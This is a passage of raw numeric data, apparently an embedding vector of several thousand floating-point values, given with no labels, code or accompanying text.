-0.0007196295191533864, 0.03033682517707348, -0.06102168187499046, 0.00314860581420362, -0.009360621683299541, 0.030539844185113907, -0.009657899849116802, -0.018257200717926025, -0.0024561663158237934, 0.017039086669683456, -0.00916485395282507, 0.0024851688649505377, 0.025116339325904846, 0.0037667257711291313, -0.02614593505859375, -0.03230901062488556, 0.023579197004437447, 0.010390217415988445, 0.034832242876291275, -0.012840946204960346, 0.023782216012477875, -0.002782446565106511, 0.006957022938877344, 0.009759409353137016, -0.03051084093749523, 0.003213861957192421, 0.027378549799323082, 0.024217255413532257, 0.021723022684454918, -0.013355744071304798, 0.0004930458962917328, 0.03172895684838295, -0.05037769302725792, -0.016067497432231903, 0.027596069499850273, 0.03726847097277641, 0.02391272783279419, -0.022085556760430336, -0.054177045822143555, -0.020533911883831024, -0.01886625774204731, -0.044983189553022385, 0.013740030117332935, -0.009527387097477913, 0.024724802002310753, 0.011412562802433968, -0.0030072175431996584, 0.03051084093749523, 0.0006761254626326263, -0.021171972155570984, 0.0031177904456853867, -0.011274799704551697, -0.006899017374962568, -0.012587171979248524, 0.035267286002635956, -0.005546766798943281, -0.042111922055482864, 0.010665743611752987, -0.01685057021677494, -0.02353569120168686, -0.008323775604367256, 0.045621249824762344, -0.0270015150308609, 0.02083844132721424, 0.03755849972367287, -0.014581108465790749, 0.016459032893180847, -0.024318765848875046, 0.04182189702987671, 0.049710631370544434, -0.03439720347523689, 0.011869355104863644, -0.03364313393831253, 0.0026791244745254517, 0.004310526419430971, 0.043446045368909836, -0.012790190987288952, 0.006569111719727516, 0.023318171501159668, 0.028466152027249336, -0.02321666292846203, -0.0006444037426263094, -0.03683343157172203, 0.00789598561823368, -0.00921560823917389, 0.0035238282289355993, 0.017764154821634293, 0.02943774126470089, -0.020055368542671204, 0.016038494184613228, -0.004270647652447224, -0.008171510882675648, 0.03694944083690643, 0.016227010637521744, -0.026856500655412674, -0.01759013906121254, -0.032541029155254364, 0.0064893546514213085, 0.01152857393026352, -0.00398424593731761, -0.014494099654257298, 0.03686243295669556, 0.021331487223505974, 0.03921165317296982, -0.04214092344045639, 0.01956232264637947, -0.027770087122917175, 0.010223452001810074, -0.0636899322271347, -0.0158354751765728, -0.015400434844195843, 0.015066903084516525, -0.018793750554323196, 0.025754399597644806, -0.01774965412914753, -0.005365499760955572, -0.06276184320449829, -0.014813129790127277, -0.024913320317864418, -0.032018981873989105, -0.00011538770195329562, 0.028843186795711517, 0.023825719952583313, -0.01898226886987686, -0.014486849308013916, 0.005673653446137905, 0.05780238285660744, 0.013435501605272293, 0.023883724585175514, 0.03596334904432297, -0.006337090395390987, -0.02008436992764473, -0.005097224842756987, -0.004415661096572876, 0.02423175610601902, 0.0010948519920930266, 0.02291213348507881, -0.016705555841326714, -0.0009489321382716298, -0.0024054115638136864, 0.0023582822177559137, -0.03596334904432297, 0.01706808991730213, 0.0072325486689805984, 0.006202952936291695, -0.04054577648639679, -0.006699624005705118, -0.025377362966537476, 0.0015298924408853054, 0.009904422797262669, -0.0000130639609778882, -0.00179998017847538, 0.008040999062359333, -0.012442158535122871, -0.005586645565927029, -0.01854722760617733, -0.02524685114622116, -0.015298925340175629, 0.032396018505096436, 0.006366092711687088, 0.00022658360830973834, 0.009614395909011364, -0.019098278135061264, -0.01667655259370804, 0.0012824631994590163, -0.007482696790248156, 0.007823478430509567, -0.029843779280781746, -0.00015928827633615583, 0.0038972380571067333, 0.027219034731388092, -0.038863617926836014, -0.02486981637775898, 0.01956232264637947, -0.039559684693813324, -0.014015555381774902, 0.005775162950158119, -0.026856500655412674, -0.0005080004339106381, 0.006445850245654583, -0.013848789967596531, -0.01500889752060175, -0.016662051901221275, 0.029959790408611298, -0.009135850705206394, -0.022868629544973373, 0.025493374094367027, 0.007341308984905481, 0.0032464899122714996, 0.0028694546781480312, -0.016821566969156265, 0.009208357892930508, -0.017894666641950607, 0.004843451082706451, 0.02339067868888378, 0.009853667579591274, 0.0037667257711291313, 0.02450728230178356, -0.012492913752794266, 0.026073427870869637, -0.0003344374126754701, 0.031438928097486496, -0.02498582750558853, -0.021084964275360107, 0.01832970790565014, 0.011891108006238937, -0.014530353248119354, -0.04840550944209099, 0.010158196091651917, -0.030684858560562134, -0.022607605904340744, -0.004832575097680092, -0.00011476459621917456, -0.0029383362270891666, 0.022172564640641212, 0.04138685390353203, -0.023260166868567467, 0.018460219725966454, -0.0059383031912148, 0.015530946664512157, 0.029408739879727364, 0.0021063212770968676, -0.005031968466937542, 0.010194449685513973, -0.03114890120923519, -0.008410783484578133, -0.008548546582460403, 0.015559948980808258, 0.03219299763441086, 0.002867642091587186, -0.0051262276247143745, 0.010549732483923435, -0.010513478890061378, -0.025754399597644806, 0.02369520626962185, 0.0018924262840300798, -0.012826444581151009, -0.03198998048901558, 0.04292399808764458, 0.050464700907468796, -0.006065189838409424, -0.00775822252035141, -0.016778063029050827, -0.016778063029050827, 0.01956232264637947, -0.03358512744307518, 0.03895062953233719, -0.03842857852578163, 0.0182862039655447, 0.023303670808672905, 0.029423240572214127, 0.019794343039393425, 0.016488036140799522, -0.04570825770497322, 0.013029463589191437, 0.03283105790615082, 0.012579921633005142, 0.013645770959556103, -0.014233076013624668, 0.012471161782741547, 0.015342429280281067, -0.005039219278842211, -0.0027226286474615335, -0.04710038751363754, -0.013812536373734474, -0.013950299471616745, -0.01403005700558424, 0.018938763067126274, 0.0028150747530162334, -0.021723022684454918, 0.0030724736861884594, 0.011724341660737991, 0.024956824257969856, -0.021432995796203613, -0.011231295764446259, -0.007888734340667725, 0.02566738985478878, -0.017155097797513008, -0.047013379633426666, -0.014247576706111431, 0.011514072306454182, -0.030742863193154335, 0.0008832229068502784, 0.02891569398343563, 0.011651835404336452, 0.0029655261896550655, 0.004107507411390543, -0.007685715798288584, 0.005775162950158119, 0.003962493967264891, -0.0008723468636162579, -0.027349546551704407, -0.03825456276535988, 0.009897171519696712, -0.0011057279771193862, 0.008990837261080742, 0.008766066282987595, -0.013261484913527966, -0.022984640672802925, 0.01134730689227581, 0.0017020960804075003, -0.03726847097277641, 0.0014827630948275328, -0.008229516446590424, -0.012427657842636108, 0.0017637268174439669, 0.02937973663210869, 0.029089709743857384, 0.025536878034472466, 0.011789598502218723, -0.008410783484578133, -0.010774503462016582, 0.00861380249261856, -0.015153911896049976, -0.017778655514121056, -0.009259112179279327, 0.002947399625554681, 0.015313426032662392, -0.008990837261080742, 0.005456133279949427, -0.009396875277161598, 0.00631171278655529, -0.02020038105547428, -0.04292399808764458, 0.004923208616673946, -0.021273480728268623, -0.016618547961115837, 0.01078900508582592, 0.026827499270439148, -0.022651109844446182, -0.017517631873488426, -0.0039697447791695595, 0.00611231941729784, -0.021084964275360107, -0.010484476573765278, 0.04080680012702942, 0.0003435007529333234, -0.02933623269200325, -0.010556982830166817, 0.06212378665804863, -0.01023070327937603, 0.010165446437895298, 0.011412562802433968, -0.00993342511355877, -0.0075116995722055435, -0.016343021765351295, -0.008352777920663357, -0.0033588754013180733, -0.023347174748778343, -0.01806868240237236, 0.006014435086399317, -0.026667984202504158, 0.04924658685922623, 0.03857359290122986, 0.024347767233848572, 0.021491002291440964, -0.029930787160992622, -0.008519543334841728, 0.017996177077293396, 0.006246456876397133, -0.00032763989293016493, 0.006576362531632185, -0.014225824736058712, -0.0053038690239191055, 0.005347372964024544, 0.004973963368684053, 0.005535890813916922, 0.0036688416730612516, -0.011180541478097439, 0.026653481647372246, 0.004843451082706451, 0.01352250948548317, -0.008737063966691494, 0.009019840508699417, 0.012746687047183514, -0.03422318771481514, -0.05350998416543007, 0.025623885914683342, -0.027088522911071777, -0.0362243726849556, -0.02801661007106304, -0.013116471469402313, 0.03033682517707348, -0.04422912001609802, 0.025942916050553322, -0.014878385700285435, 0.01944631151854992, 0.029089709743857384, -0.016778063029050827, 0.020867442712187767, 0.00991167314350605, 0.014631862752139568, -0.011651835404336452, -0.014682617969810963, 0.002260398119688034, 0.06554610282182693, -0.024855315685272217, 0.003253740491345525, -0.020867442712187767, -0.016183506697416306, 0.03773251548409462, -0.0379355326294899, -0.02720453403890133, 0.0026301825419068336, -0.02800210751593113, -0.024536285549402237, -0.028553159907460213, -0.014414342120289803, 0.029698766767978668, -0.005981807131320238, 0.010252455249428749, -0.026377957314252853, 0.007323182187974453, -0.003105101641267538, 0.0004520342918112874, 0.010723749175667763, 0.021229976788163185, 0.04074879363179207, 0.025855908170342445, -0.03671741858124733, -0.04904356971383095, 0.01445059571415186, 0.0315549373626709, -0.0032809306867420673, 0.004096631426364183, 0.0047636935487389565, -0.011245797388255596, -0.007080284412950277, 0.020591918379068375, 0.04889855533838272, -0.006333464756608009, 0.002309340052306652, 0.018460219725966454, 0.005133477970957756, 0.0014465097337961197, -0.002639245707541704, -0.020533911883831024, -0.020635422319173813, 0.03187396749854088, 0.008461537770926952, 0.010404719039797783, -0.021607013419270515, 0.01738712005317211, -0.021128468215465546, -0.008548546582460403, -0.04228593781590462, -0.006790257524698973, 0.002260398119688034, -0.021534506231546402, -0.03767450898885727, -0.005844044499099255, 0.0009480257867835462, -0.018358709290623665, -0.0046368069015443325, 0.014320083893835545, 0.02253509871661663, 0.03689143434166908, -0.005546766798943281, -0.014675366692245007, -0.006558235734701157, -0.021026957780122757, -0.009367872960865498, -0.02194054424762726, 0.05484410747885704, 0.030307823792099953, -0.006239206064492464, -0.017865663394331932, 0.02225957252085209, -0.006913518998771906, 0.016618547961115837, -0.01387054193764925, 0.02241908758878708, -0.024057740345597267, 0.029292728751897812, -0.05362599343061447, 0.029147714376449585, -0.02163601480424404, -0.029452243819832802, -0.037703510373830795, 0.006928020156919956, -0.016459032893180847, 0.00485070189461112, 0.02736404910683632, 0.0036670290865004063, -0.01020895130932331, -0.03410717844963074, -0.043388042598962784, 0.022549599409103394, -0.018054181709885597, 0.00721442187204957, -0.02582690492272377, -0.028466152027249336, -0.021824533119797707, -0.017184101045131683, 0.010498978197574615, -0.02540636621415615, -0.0022277699317783117, 0.011434314772486687, -0.002387284766882658, -0.023985233157873154, -0.02943774126470089, -0.0045860521495342255, -0.021491002291440964, -0.017836662009358406, -0.014544854871928692, -0.005543141160160303, 0.0011166039621457458, -0.009208357892930508, 0.027016015723347664, 0.031380921602249146, 0.012550919316709042, 0.021969545632600784, -0.006217454094439745, 0.023260166868567467, -0.015719464048743248, 0.005028343293815851, -0.017662644386291504, -0.020432403311133385, 0.03689143434166908, -0.02534836158156395, -0.000329905713442713, -0.0011746094096451998, 0.03335310518741608, -0.01960582658648491, 0.02859666384756565, -0.036050356924533844, 0.010527980513870716, 0.017314612865447998, -0.03216399624943733, -0.008468789048492908, 0.024898819625377655, 0.005006591323763132, 0.01912728138267994, -0.010607738047838211, -0.02104146033525467, -0.004680310841649771, -0.003059784881770611, -0.007990243844687939, -0.024101244285702705, -0.009795662015676498, -0.009041592478752136, -0.04037176072597504, -0.026900004595518112, -0.012920703738927841, 0.03077186644077301, -0.007257925812155008, -0.009440379217267036, -0.0003847389598377049, 0.013935797847807407, -0.009237360209226608, -0.0285386573523283, 0.00986091885715723, -0.057048313319683075, -0.028248630464076996, -0.03219299763441086, 0.003342561423778534, -0.007421066053211689, -0.005854920484125614, 0.021070461720228195, -0.022274075075984, 0.0017383494414389133, -0.027668576687574387, -0.002927460242062807, 0.009389624930918217, 0.02492782101035118, 0.01352250948548317, -0.017619140446186066, 0.008149758912622929, 0.04164787754416466, -0.021534506231546402, 0.02513084001839161, -0.034629225730895996, 0.019330300390720367, 0.0213024839758873, -0.003010842949151993, -0.008838573470711708, 0.02152000367641449, -0.027915099635720253, 0.02778458781540394, 0.002769757993519306, 0.0009126787772402167, -0.00940412562340498, -0.004219892900437117, -0.006525607779622078, 0.0007921362994238734, 0.015719464048743248, -0.005086348857730627, -0.02167951874434948, -0.043185021728277206, 0.012630676850676537, 0.012536417692899704, 0.02353569120168686, 0.01743062399327755, -0.035789333283901215, 0.005068222060799599, 0.009244611486792564, -0.02933623269200325, 0.013377496041357517, 0.022665610536932945, 0.012906202115118504, -0.03335310518741608, -0.02933623269200325, -0.022085556760430336, -0.005637399852275848, 0.0029655261896550655, -0.00470206281170249, -0.022781621664762497, 0.0002678218297660351, 0.009288115426898003, -0.006337090395390987, 0.012630676850676537, -0.01350075751543045, -0.00919385626912117, -0.016807066276669502, 0.0025359236169606447, 0.010803506709635258, -0.00261024315841496, 0.01532792765647173, 0.0032156745437532663, -0.008715311996638775, 0.011050029657781124, 0.044142112135887146, 0.025855908170342445, 0.01870674267411232, 0.006873640231788158, -0.01437808945775032, 0.007975743152201176, 0.015980487689375877, 0.012601673603057861, -0.008236766792833805, 0.001173703116364777, 0.005195108707994223, 0.017996177077293396, -0.014813129790127277, -0.00011187565542059019, -0.010506228543817997, 0.00842528510838747, -0.024275261908769608, -0.05118976905941963, 0.022085556760430336, -0.039240654557943344, 0.0005891173495911062, 0.010876012966036797, 0.03819655627012253, 0.0036688416730612516, -0.0067648799158632755, 0.021766526624560356, 0.0019014895660802722, -0.025043832138180733, 0.02018588036298752, 0.010455474257469177, 0.009556390345096588, 0.0006317151128314435, 0.013544261455535889, 0.013109221123158932, 0.03799353912472725, -0.0004620039544533938, 0.01049172692000866, -0.001380347297526896, 0.013232482597231865, -0.005521389190107584, 0.0028567661065608263, 0.0022060179617255926, 0.0015924295876175165, -0.013442751951515675, -0.004346780013293028, -0.014037307351827621, -0.0067141251638531685, 0.00107944430783391, -0.015864478424191475, -0.008802319876849651, -0.020113373175263405, 0.02088194526731968, 0.014414342120289803, -0.016618547961115837, -0.017923669889569283, -0.02530485764145851, 0.01806868240237236, -0.001824451144784689, 0.004640432074666023, -0.01882275380194187, -0.024637794122099876, 0.0028205127455294132, 0.023028144612908363, -0.01854722760617733, -0.00041963282274082303, 0.00884582381695509, -0.032976072281599045, 0.026696987450122833, 0.019518818706274033, -0.01896776631474495, 0.00350751425139606, -0.010201700031757355, -0.025261353701353073, -0.00863555446267128, 0.007663963828235865, -0.008766066282987595, 0.002131698653101921, -0.02008436992764473, 0.037065453827381134, 0.09263462573289871, 0.006347966380417347, -0.0018869882915169, -0.009614395909011364, 0.00037748829345218837, -0.01318172737956047, -0.01918528601527214, -0.022332079708576202, 0.0011138849658891559, 0.019272295758128166, 0.006086941808462143, 0.002990903565660119, -0.005318370182067156, 0.017140597105026245, -0.0057534109801054, -0.012376902624964714, 0.012108627706766129, -0.0004316417616792023, 0.01408081129193306, -0.013740030117332935, -0.014979895204305649, 0.022491594776511192, -0.0047673191875219345, -0.015081404708325863, 0.016865070909261703, -0.016618547961115837, 0.0035872715525329113, -0.012739436700940132, -0.06438599526882172, -0.0002205791388405487, 0.013080217875540257, 0.0061304462142288685, 0.010477226227521896, -0.017764154821634293, -0.008410783484578133, -0.010020432993769646, 0.009621646255254745, -0.03477424010634422, 0.005568518768996, -0.005329246167093515, -0.002539549022912979, -0.021505502983927727, -0.0016187132569029927, 0.01896776631474495, -0.002131698653101921, -0.011340056546032429, 0.019678333774209023, -0.006978774908930063, 0.009179354645311832, 0.00413288502022624, 0.018054181709885597, -0.0012480225414037704, 0.00789598561823368, 0.02502933144569397, 0.009498384781181812, 0.006155823357403278, 0.006754003930836916, -0.007605958264321089, -0.028466152027249336, 0.00900533888489008, 0.0006883610039949417, -0.0002006397844525054, 0.011412562802433968, -0.012848196551203728, 0.018054181709885597, 0.0063878451474010944, -0.027944102883338928, -0.004890580661594868, -0.011419814079999924, 0.02402873896062374, 0.006007184740155935, 0.011340056546032429, -0.023724209517240524, 0.0014066309668123722, 0.002084569074213505, 0.03468723222613335, 0.014813129790127277, 0.0460272878408432, -0.029466744512319565, -0.009077845141291618, 0.009708654135465622, 0.021853536367416382, 0.0034893874544650316, 0.022984640672802925, -0.018619734793901443, 0.03895062953233719, -0.027335045859217644, -0.0025504250079393387, -0.015893479809165, 0.00882407184690237, 0.001399380387738347, -0.0083165243268013, 0.01445059571415186, 0.009251861833035946, -0.0000867815178935416, 0.02370970882475376, -0.002573989797383547, 0.013856040313839912, 0.016836067661643028, -0.016879571601748466, 0.01611100137233734, -0.005528640002012253, -0.004401159938424826, -0.011978115886449814, -0.016386525705456734, 0.006416847463697195, -0.0008392656454816461, 0.024217255413532257, 0.023579197004437447, -0.011680837720632553, 0.00807725265622139, -0.002051941119134426, -0.013145474717020988, -0.023100651800632477, -0.022085556760430336, -0.002461604308336973, 0.0054343813098967075, 0.006181200500577688, -0.0037340978160500526, -0.01970733515918255, -0.031757958233356476, -0.010905015282332897, 0.006725001148879528, -0.0022748992778360844, 0.007845230400562286, 0.015342429280281067, -0.00649660499766469, -0.0031866717617958784, 0.013058465905487537, 0.01405905932188034, 0.027059519663453102, -0.021810030564665794, 0.009027090854942799, -0.025754399597644806, 0.02684199996292591, -0.0237532127648592, 0.018155690282583237, 0.010013182647526264, -0.01669105514883995, 0.014088062569499016, -0.008932831697165966, 0.002719003241509199, 0.03051084093749523, 0.009150352329015732, -0.004499044269323349, -0.012601673603057861, 0.010716497898101807, -0.00017605545872356743, 0.0016667490126565099, 0.01866323873400688, 0.01516841258853674, -0.026435961946845055, 0.011485069990158081, 0.01934480108320713, -0.014305582270026207, 0.013450002297759056, 0.03767450898885727, -0.011586579494178295, 0.008200514130294323, -0.009230109862983227, -0.025942916050553322, -0.0022332079242914915, 0.0276830792427063, -0.010274207219481468, 0.006376969162374735, 0.04347505047917366, 0.01408081129193306, 0.005659152287989855, -0.03512227162718773, -0.012311646714806557, -0.008178762160241604, 0.002137136645615101, -0.006986025720834732, -0.006554610561579466, 0.01134730689227581, -0.0054307556711137295, -0.025275854393839836, 0.008976335637271404, 0.015081404708325863, 0.0018181068589910865, -0.009831915609538555, 0.010832509025931358, -0.012550919316709042, -0.030742863193154335, 0.014704369939863682, -0.024840813130140305, 0.0052023595198988914, 0.005760661326348782, -0.027277041226625443, 0.0035963349509984255, 0.008207764476537704, 0.04385208338499069, -0.009766659699380398, -0.015342429280281067, -0.0008333745063282549, -0.003516577649861574, 0.011869355104863644, -0.011173291131854057, -0.015313426032662392, 0.012492913752794266, -0.012159382924437523, 0.011274799704551697, -0.011869355104863644, -0.013486255891621113, -0.00758420629426837, -0.022013049572706223, -0.041270844638347626, 0.01065124198794365, 0.0173726174980402, -0.0005882110563106835, 0.026348954066634178, 0.005572143942117691, 0.022042052820324898, 0.011361808516085148, 0.018837254494428635, -0.0076929666101932526, -0.000471747072879225, -0.016386525705456734, 0.0030489088967442513, -0.010303209535777569, -0.014247576706111431, 0.04066178575158119, -0.010013182647526264, 0.0166330486536026, 0.005811416078358889, 0.01822819747030735, 0.042169928550720215, -0.00951288640499115, -0.02514534257352352, 0.008860325440764427, -0.031235909089446068, -0.008584799244999886, 0.005506888031959534, 0.01599499024450779, 0.0036180869210511446, -0.018576230853796005, 0.020316392183303833, -0.011847603134810925, -0.007250675465911627, -0.008019247092306614, -0.00021049617498647422, -0.0030017795506864786, -0.04066178575158119, -0.0004667622270062566, 0.01208687573671341, -0.00029637134866788983, -0.015530946664512157, -0.0039588687941432, -0.016285017132759094, 0.021534506231546402, 0.011434314772486687, -0.005111726000905037, -0.01429108064621687, 0.02030189149081707, 0.006155823357403278, -0.0014229450607672334, 0.01094852015376091, -0.017155097797513008, -0.003955243621021509, -0.018735745921730995, -0.0007060345378704369, -0.018300704658031464, -0.008273020386695862, 0.011978115886449814, 0.01477687619626522, 0.0319029726088047, -0.005474260076880455, -0.006634368095546961, 0.006779381539672613, -0.010955770500004292, -0.00025173439644277096, 0.0004925927496515214, -0.01115878950804472, -0.004535297397524118, 0.022346582263708115, -0.00986091885715723, 0.0037812271621078253, 0.005626523867249489, -0.007729219738394022, 0.004346780013293028, 0.017039086669683456, 0.009027090854942799, 0.001283369492739439, 0.0074101900681853294, -0.0011048216838389635, -0.023419681936502457, -0.02014237642288208, -0.008606551215052605, -0.008903829380869865, -0.0006969711394049227, 0.0007150978781282902, 0.005651901476085186, 0.003621712327003479, 0.0037848525680601597, 0.0150959063321352, 0.008294772356748581, -0.015371431596577168, 0.0035365168005228043, -0.0036525276955217123, 0.03570232540369034, -0.0011610144283622503, 0.021694021299481392, 0.011144287884235382, 0.0016295892419293523, 0.012159382924437523, -0.006373343523591757, -0.029727768152952194, -0.005318370182067156, 0.027059519663453102, -0.00975215807557106, -0.006518356967717409, -0.00184620323125273, -0.027059519663453102, 0.016778063029050827, 0.019301297143101692, 0.007997495122253895, 0.00008559195703128353, 0.010179948061704636, -0.008932831697165966, 0.0009987804805859923, 0.011862104758620262, -0.008715311996638775, -0.028930194675922394, 0.005068222060799599, -0.008708060719072819, 0.017416121438145638, -0.013558763079345226, 0.014544854871928692, 0.0031794211827218533, 0.0028767054900527, 0.019301297143101692, 0.04393909126520157, 0.027726583182811737, 0.017024585977196693, 0.0019957483746111393, 0.00774372136220336, 0.013986553065478802, 0.008512292988598347, -0.012202886864542961, 0.012761188670992851, -0.02082393877208233, 0.01283369492739439, -0.00022907601669430733, 0.016285017132759094, 0.023187659680843353, -0.021723022684454918, -0.0015616142190992832, 0.014247576706111431, -0.01400830503553152, -0.005086348857730627, -0.012094126082956791, -0.0007531638839282095, -0.008200514130294323, 0.013761782087385654, 0.00009074673289433122, 0.02439127117395401, -0.014653614722192287, 0.01078900508582592, 0.0027443806175142527, -0.026972511783242226, 0.019040273502469063, -0.03135192021727562, 0.01870674267411232, -0.010897764936089516, 0.016169006004929543, -0.008418033830821514, -0.013776282779872417, 0.010665743611752987, 0.012347900308668613, -0.009875419549643993, 0.019750839099287987, 0.009201106615364552, -0.007707467768341303, -0.015371431596577168, 0.00994067545980215, -0.004172763787209988, 0.030626852065324783, 0.005760661326348782, -0.021084964275360107, 0.011456066742539406, 0.007138289976865053, -0.037819523364305496, -0.014979895204305649, -0.0009715905180200934, -0.019330300390720367, 0.023405179381370544, -0.01896776631474495, 0.0044591655023396015, -0.024594290181994438, -0.012884450145065784, 0.0158354751765728, -0.005321995820850134, 0.029727768152952194, 0.009179354645311832, 0.012166633270680904, 0.004520796239376068, 0.009063344448804855, 0.008693560026586056, -0.016502536833286285, 0.009889921173453331, 0.008186012506484985, 0.025681892409920692, 0.0033008698374032974, 0.011086282320320606, 0.01057873573154211, 0.016227010637521744, 0.009280864149332047, -0.03007580153644085, 0.030945882201194763, -0.01769164763391018, 0.03503526374697685, -0.012869948521256447, -0.012790190987288952, -0.008302023634314537, -0.0039044886361807585, -0.009048842824995518, -0.019199788570404053, 0.020374396815896034, -0.008679058402776718, 0.013283236883580685, 0.007475446444004774, -0.0007064876845106483, -0.041850898414850235, -0.014095312915742397, -0.013508007861673832, -0.012507415376603603, -0.004397534765303135, 0.0027770085725933313, -0.016023991629481316, -0.025362862274050713, -0.014392590150237083, 0.002323841443285346, -0.011753344908356667, 0.014204072766005993, 0.005724408198148012, 0.018199194222688675, 0.005336496978998184, 0.019576823338866234, -0.027436556294560432, 0.023347174748778343, 0.002057379111647606, -0.00850504171103239, -0.021229976788163185, 0.007007777690887451, -0.012094126082956791, 0.0027262538205832243, 0.0019304923480376601, 0.014813129790127277, 0.0010921329958364367, -0.008273020386695862, 0.015545448288321495, -0.0037703511770814657, -0.00024267104163300246, 0.008439785800874233, -0.021229976788163185, -0.011499570682644844, 0.008526794612407684, 0.008940082974731922, -0.004625930916517973, -0.013304988853633404, 0.02895919792354107, -0.02067892625927925, 0.0035038888454437256, 0.00833827629685402, 0.012028870172798634, 0.015385933220386505, 0.00921560823917389, 0.0044265370815992355, -0.00845428742468357, -0.02333267405629158, 0.0007721969159319997, 0.009418627247214317, 0.003723221831023693, -0.006061564665287733, 0.01347175519913435, -0.023158656433224678, 0.008896579034626484, -0.0024144749622792006, -0.00866455677896738, 0.012587171979248524, 0.023042645305395126, 0.03442620486021042, 0.0045570493675768375, 0.01046997494995594, -0.004589677322655916, 0.013174477033317089, -0.010643991641700268, 0.007366686128079891, 0.00020619107817765325, 0.009389624930918217, -0.0013205292634665966, 0.01461011078208685, -0.004542548209428787, 0.001297870883718133, 0.022564101964235306, 0.008040999062359333, 0.02466679736971855, 0.008120756596326828, -0.005684529431164265, 0.001103915274143219, 0.0050718472339212894, 0.0010948519920930266, -0.015907982364296913, -0.01785116270184517, 0.0038754858542233706, -0.01669105514883995, 0.0033389360178261995, -0.012761188670992851, 0.00844703707844019, -0.005619273521006107, 0.02257860265672207, 0.0035691449884325266, -0.0018597982125356793, 0.009998681023716927, 0.0015244544483721256, 0.009099597111344337, -0.010745501145720482, -0.0018480158178135753, -0.031119897961616516, -0.014675366692245007, 0.02658097632229328, 0.02465229667723179, 0.0008039186359383166, -0.02014237642288208, -0.010941268876194954, 0.02120097540318966, 0.01373277883976698, 0.0190837774425745, -0.009150352329015732, -0.009607144631445408, 0.013696525245904922, 0.006369718350470066, -0.0012670555151998997, 0.0012289894511923194, 0.01299320999532938, 0.006242831237614155, 0.013464503921568394, 0.0033806273713707924, -0.013413749635219574, -0.017894666641950607, 0.012695932760834694, 0.010187198407948017, 0.01701008342206478, 0.023941729217767715, -0.0036470897030085325, -0.010941268876194954, 0.02109946496784687, -0.010549732483923435, -0.02933623269200325, 0.003955243621021509, 0.002300276653841138, -0.017184101045131683, -0.027088522911071777, -0.027813591063022614, -0.0059999339282512665, -0.002316590864211321, -0.013297738507390022, -0.0008850355516187847, -0.002093632472679019, 0.012289894744753838, 0.00013345773913897574, 0.0042778984643518925, 0.012927954085171223, 0.006007184740155935, -0.003289993852376938, -0.003289993852376938, 0.009077845141291618, 0.018184693530201912, -0.0008342808578163385, -0.0004520342918112874, 0.010701997205615044, 0.002811449347063899, 0.0032464899122714996, 0.017198601737618446, 0.003386065363883972, 0.0024924196768552065, 0.0010712873190641403, -0.018315205350518227, -0.0000194720287254313, 0.008679058402776718, 0.012057873420417309, -0.015646956861019135, -0.008853074163198471, 0.0008297491585835814, 0.004658558871597052, -0.01753213256597519, -0.006928020156919956, 0.01950431615114212, -0.03013380616903305, 0.0008283896604552865, -0.008860325440764427, 0.010498978197574615, -0.023158656433224678, -0.015023399144411087, -0.005644650664180517, -0.0008850355516187847, -0.004807197954505682, -0.0011428877478465438, 0.00845428742468357, 0.029046205803751945, -0.008642804808914661, -0.006619866471737623, 0.006514731794595718, 0.00467668566852808, -0.004180014133453369, 0.017720650881528854, 0.049507610499858856, 0.0007241612183861434, -0.012666929513216019, -0.010745501145720482, -0.01421857438981533, 0.0033461865969002247, -0.0033081206493079662, -0.002149825217202306, 0.0008759722113609314, -0.016923075541853905, -0.019330300390720367, 0.009367872960865498, -0.009179354645311832, -0.0292202215641737, 0.01535692997276783, -0.007468195632100105, -0.006090567447245121, 0.0027316920459270477, -0.0032609913032501936, 0.014762374572455883, 0.0033081206493079662, -0.011390810832381248, -0.0071056620217859745, 0.006181200500577688, 0.008940082974731922, -0.008758815936744213, -0.02614593505859375, 0.00184348423499614, -0.018996769562363625, 0.029191218316555023, 0.011637333780527115, -0.027335045859217644, -0.002457978902384639, 0.0007182700210250914, 0.0005981806898489594, -0.004089381080120802, -0.006257332861423492, -0.00921560823917389, -0.014494099654257298, -0.012790190987288952, 0.01168808899819851, 0.005017467308789492, -0.0023274668492376804, 0.006166699342429638, -0.005891173612326384, -0.000994248897768557, -0.01928679645061493, 0.011564827524125576, 0.005564893130213022, -0.02588491141796112, 0.006768505554646254, 0.00010677752288756892, -0.0056627774611115456, 0.017155097797513008, -0.0008569391793571413, -0.0003382893337402493, 0.005506888031959534, 0.005314745008945465, 0.012797442264854908, -0.006463977042585611, -0.008229516446590424, 0.0017410684376955032, 0.019852349534630775, 0.020345395430922508, -0.006739502772688866, -0.024246258661150932, -0.02237558364868164, 0.008990837261080742, -0.006315338425338268, -0.0021389492321759462, 0.004035000689327717, 0.0040495023131370544, -0.01329048816114664, 0.01329048816114664, 0.014153318479657173, 0.002976402174681425, -0.00612682057544589, 0.00485070189461112, 0.007678464986383915, -0.02672598883509636, -0.016140002757310867, 0.018039681017398834, 0.005960055161267519, -0.0019123656675219536, 0.008142508566379547, 0.011340056546032429, 0.024884317070245743, 0.003741348395124078, 0.014363587833940983, -0.03236701339483261, 0.008244018070399761, 0.009121350012719631, 0.010745501145720482, 0.007286928594112396, 0.002704501850530505, 0.003777601756155491, -0.0010848823003470898, 0.003221112536266446, -0.022767120972275734, 0.004723814781755209, 0.002028376329690218, 0.0017573824152350426, -0.03413617983460426, -0.014109814539551735, 0.015240919776260853, -0.013638520613312721, -0.015907982364296913, -0.031322918832302094, -0.02257860265672207, 0.0014120690757408738, 0.01318172737956047, 0.01950431615114212, 0.025261353701353073, -0.007794476114213467, -0.02018588036298752, 0.0008120756247080863, 0.004999340511858463, -0.009795662015676498, -0.024217255413532257, 0.007051281630992889, -0.014653614722192287, -0.01609649881720543, -0.015255420468747616, -0.019620327278971672, 0.015762967988848686, 0.009280864149332047, 0.020925449207425117, 0.01139806117862463, -0.000020845691324211657, -0.00503559410572052, -0.03535429388284683, -0.022651109844446182, -0.007127413991838694, 0.006521982606500387, 0.02763957343995571, 0.003391503356397152, -0.00667062122374773, 0.0071564167737960815, -0.0027226286474615335, -0.003304495243355632, -0.008932831697165966, 0.011659085750579834, -0.030945882201194763, 0.02072243019938469, -0.009686902165412903, 0.0068446374498307705, -0.012007118202745914, 0.004934084601700306, -0.005760661326348782, 0.00022386459750123322, 0.013906795531511307, 0.01312372274696827, -0.010020432993769646, 0.005992683116346598, 0.004422911908477545, -0.0027298792265355587, -0.012369652278721333, -0.010411969386041164, -0.003585458965972066, 0.011811350472271442, 0.0021335112396627665, -0.016589544713497162, -0.007446443662047386, -0.005412629339843988, 0.003047096310183406, 0.008222266100347042, 0.02273811772465706, 0.00650748098269105, 0.003190297167748213, 0.0031939225737005472, -0.01275393832474947, -0.02433326654136181, 